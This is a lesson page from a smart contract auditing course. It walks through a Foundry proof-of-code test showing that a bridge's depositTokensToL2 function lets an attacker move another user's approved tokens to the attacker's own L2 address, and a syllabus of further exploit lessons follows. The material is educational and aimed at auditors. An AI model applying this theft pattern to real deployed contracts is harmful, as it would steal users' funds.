Smart Contract Security - Arbitrary From: Poc

Support

_Follow along with the video lesson:_ --- ### Exploit - Arbitrary From - PoC Now that we've identified an exploit in the use of an `arbitrary from` in `depositTokensToL2`, let's write a Proof of Code to demonstrate the issue. We can leverage the existing test suite to write our tests. Navigate to `L1TokenBridge.t.sol`. This test suite has a decent setup we can leverage, so our user (Alice) is configured with funds already and a vault etc has been prepped for us. Our test should just need to start with Alice, innocently approving the tokens she wants to move to L2. ```js function testCanMoveApprovedTokensOfOtherUsers() public { // poor Alice approving vm.prank(user); token.approve(address(tokenBridge), type(uint256).max); vm.stopPrank(); } ``` Now's time for Bob. We're going to set the amountToSteal to Alice's token.balanceOf and create a new attacker user to represent Bob in the transaction. We then prank the attacker. ```js uint256 amountToSteal = token.balanceOf(user); address attacker = makeAddr("attacker"); vm.prank(attacker); ``` From here, the order in which we do things in quite important. We know when `depositTokensToL2` is called that an event is emitted and at the root of this vulnerability is that this event is going to be populated with malicious data - Bob's L2 address! In order to detect an event in Foundry's test framework we can use `vm.expectEmit`. By setting `vm.expectEmit`, _then_ emitting what we expect the function to emit, **_then_** calling that function, the test suite will compare our expectations to what is actually emitted by the function. ```js vm.expectEmit(address(tokenBridge)); emit Deposit(user, attacker, amountToSteal); tokenBridge.depositTokensToL2(user, attacker, amountToSteal); ``` And finally, we can close our test off with some assertions. We can show that Bob's transaction left Alice with 0 tokens, and that those tokens are in the vault, waiting to be minting on L2 at the emitted L2 address (Bob's!) ```js assertEq(token.balanceOf(user), 0); assertEq(token.balanceOf(address(vault)), amountToSteal); vm.stopPrank(); ``` <details> <summary>testCanMoveApprovedTokensOfOtherUsers</summary> ```js function testCanMoveApprovedTokensOfOtherUsers() public { // poor Alice approving vm.prank(user); token.approve(address(tokenBridge), type(uint256).max); vm.stopPrank(); uint256 amountToSteal = token.balanceOf(user); address attacker = makeAddr("attacker"); vm.prank(attacker); vm.expectEmit(address(tokenBridge)); emit Deposit(user, attacker, amountToSteal); tokenBridge.depositTokensToL2(user, attacker, amountToSteal); assertEq(token.balanceOf(user), 0); assertEq(token.balanceOf(address(vault)), amountToSteal); vm.stopPrank(); } ``` </details> Now, we can run this test. ```bash forge test --mt testCanMoveApprovedTokensOfOtherUsers -vvv ``` ::image{src='/security-section-7/20-arbitrary-poc/arbitrary-poc1.png' style='width: 100%; height: auto;'} ### Wrap Up Boom! A proof of code demonstrating that anyone can call this function on someone elses approved tokens, stealing them on L2. Our first `High`, we found it pretty quick and `Slither` was a huge help, thanks `Slither`! Let's keep going, `Slither` had another red detector in that output... See you in the next lesson!

Arbitrary From: Poc

We detail a proof of code for our identified 'arbitrary from' vulnerability.

Solidity Developer

Smart Contract Security

Course Introduction

Duration: 25min

Section 1: Review

Duration: 1h 18min

Section 2: What is a smart contract audit

Duration: 35min

Section 3: Your First Audit | PasswordStore

Duration: 2h 28min

Section 4: Puppy raffle

Duration: 5h 03min

Section 5: TSwap

Duration: 5h 22min

Section 6: Thunder Loan

Duration: 4h 33min

Section 7: Boss Bridge

Duration: 2h 01min

1. Introduction

Patrick introduces the Boss Bridge protocol and the sorts of concepts that will be covered in this section. Duration: 5min

2. Phase 1: Scoping

Learn about scoping, coverage reports, understanding roles, thorough documentation, code coverage, stateful fuzzing tests, and invariant testing. Duration: 6min

3. Phase 2: Recon

Code Review - Static Analysis Tools & Fixing Issues. Patrick leverages Slither and Aderyn to dive into Boss Bridge. Duration: 2min

4. Checklist

Patrick details the 'Hans' approach to security reviews and leveraging Hans' Audit Checklist (available on Solodit). Duration: 4min

5. Docs

The audit begins with assessing the documentation and gaining context of the Boss Bridge protocol! Duration: 2min

6. Boss Bridge Diagram

In this lesson we visualize the transaction flow of Boss Bridge using protocol diagrams. Duration: 6min

7. L1Token.sol

A brief run through a fairly standard token contract contained in Boss Bridge. Duration: 2min

8. L1Vault.sol

Patrick scopes out L1Vault.sol for potential security vulnerabilities. Duration: 4min

9. Yul Opcodes

Approaching low level code during a protocol audits. Duration: 2min

10. Unsupported Opcodes

Learn about the importance of checking compatibility before deploying contracts across different L2s and chains. Duration: 11min

11. L1BossBridge.sol

ZkSync & Boss Bridge Code Analysis - Reentrancy Guard, Message Utils, Pausable Library. Focuses on adding an emergency stop and preventing re-entrancy attacks. Duration: 3min

12. Signatures

Patrick introduces the ERC-191 signed data format and how signatures are used in the EVM. Discusses the ecrecover precompile. Duration: 6min

13. Signatures Summarized

Learn how the ECDSA (elliptic curve digital signature algorithm) is leveraged in transactions to verify signatures. Duration: 1min

14. EIP-712

We dive into EIP-712 and introduce typed structured data hashing and signing with minimalistic examples. Duration: 4min

15. Case Study: Polygon

We dive into the infamous polygon hack as a case study of bridge exploits. Duration: 9min

16. Signatures Recap

Elliptic Curve Digital Signature Algorithm & Verification Explained. Emphasis on ecrecover, V, R and S values, and on-chain data protection. Duration: 1min

17. Recon Continued

Patrick explains ECDSA signing & verification with OpenZeppelin examples, focuses on signature-related bugs within Boss Bridge. Duration: 6min

18. depositTokenToL2

'depositTokenToL2' Function in Brief. The function locks tokens in a vault, triggers L2 minting. Duration: 2min

19. Exploit: Arbitrary From

With the help of Slither, Patrick identifies and discusses an 'Arbitrary From' vulnerability. Duration: 3min

20. Arbitrary From: Poc

We detail a proof of code for our identified 'arbitrary from' vulnerability. Duration: 4min

21. Recon Continued (again)

Static analysis using Slither identifies potential vulnerabilities, Patrick issues a warning for false positives. Duration: 5min

22. Exploit: Infinite Mint

Highlights the "Infinite Mint" vulnerability in Boss Bridge that allows any user to steal funds if the vault approves the bridge. Duration: 4min

23. Why are these not the same finding?

Patrick discusses how to identify if similar findings are recognized as unique bugs and how to determine distinct vulnerabilities by considering the root cause. Duration: 2min

24. Recon Continued Again (again)

Dive into the withdraw function and the potential protections versus replay attacks. Duration: 6min

25. Exploit: Signature Replay

Learn about cryptographic verification and blockchain signatures as well as preserving the integrity of signed messages. Duration: 1min

26. Signature Replay: Minimized

Create a Signature Replay Attack using sc-exploits-minimized in Remix! Duration: 2min

27. Signature Replay PoC

We walk through a PoC for signature replay attacks with Patrick. Duration: 7min

28. Signature Replay: Prevention

Learn about nonce-based protection against replay attacks in transaction handling. Duration: 1min

29. Exploit: Low level call to itself

Patrick focuses on identifying and resolving two significant security issues within Boss Bridge. Duration: 2min

30. Exploit: Gas Bomb

Patrick details a gas bomb attack and how gas costs can be manipulated, with test cases. Duration: 1min

31. Recap

Recap vulnerabilities including chain incompatibilities, signature replays, and bridge hacks. Emphasizes the importance of learning through PoCs. Duration: 5min

32. Exercises

Patrick details a number of exercises to take to supplement the learnings of this section! Duration: 2min

Section 8: MEV & Governance

Duration: 1h 40min